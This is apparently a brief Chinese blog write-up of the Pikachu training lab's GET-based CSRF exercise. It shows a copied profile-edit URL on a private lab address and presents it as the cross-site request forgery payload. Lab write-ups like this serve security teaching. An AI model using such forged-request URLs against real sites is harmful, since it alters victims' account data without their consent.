技术栈

Pikachu-csrf-CSRF(get)

什么鬼昵称2024-10-06 13:34

登陆,修改个人信息;发现这是个get请求

把请求连接复制出来

复制代码
​http://192.168.3.224:8082/vul/csrf/csrfget/csrf_get_edit.php?sex=1&phonenum=1&add=2&email=3&submit=submit

就是 get请求的csrf 攻击payload

上一篇:Linux基于CentOS学习【进程状态】【进程优先级】【调度与切换】【进程挂起】【进程饥饿】
下一篇:TopK算法在大数据重复数据分析中的应用与挑战
相关推荐
独立开阀者_FwtCoder
1 分钟前
你用 Cursor 写公司的代码安全吗?
前端·javascript·github
Cacciatore->
12 分钟前
React 基本介绍与项目创建
前端·react.js·arcgis
摸鱼仙人~
13 分钟前
React Ref 指南:原理、实现与实践
前端·javascript·react.js
teeeeeeemo
14 分钟前
回调函数 vs Promise vs async/await区别
开发语言·前端·javascript·笔记
贵沫末
33 分钟前
React——基础
前端·react.js·前端框架
aklry
1 小时前
uniapp三步完成一维码的生成
前端·vue.js
Rubin93
1 小时前
判断元素在可视区域?用于滚动加载,数据埋点等
前端
爱学习的茄子
1 小时前
AI驱动的单词学习应用:从图片识别到语音合成的完整实现
前端·深度学习·react.js
用户380225859824
1 小时前
使用three.js实现3D地球
前端·three.js
程序无bug
1 小时前
Spring 面向切面编程AOP 详细讲解
java·前端
热门推荐
01集群聊天服务器---MySQL数据库的建立02GPU 进阶笔记(二):华为昇腾 910B GPU03Coze扣子平台完整体验和实践(附国内和国际版对比)04使用Ruby接入实时行情API教程05Word粘贴时出现“运行时错误53,文件未找到:MathPage.WLL“的解决方案06扣子(coze)实战|我用扣子搭建了一个自动分析小红薯笔记内容的AI应用|详细步骤拆解07Java学习第十五部分——MyBatis08扣子空间的使用教程与大模型技术思考09DeepSeek各版本说明与优缺点分析10基于odoo17的设计模式详解---装饰模式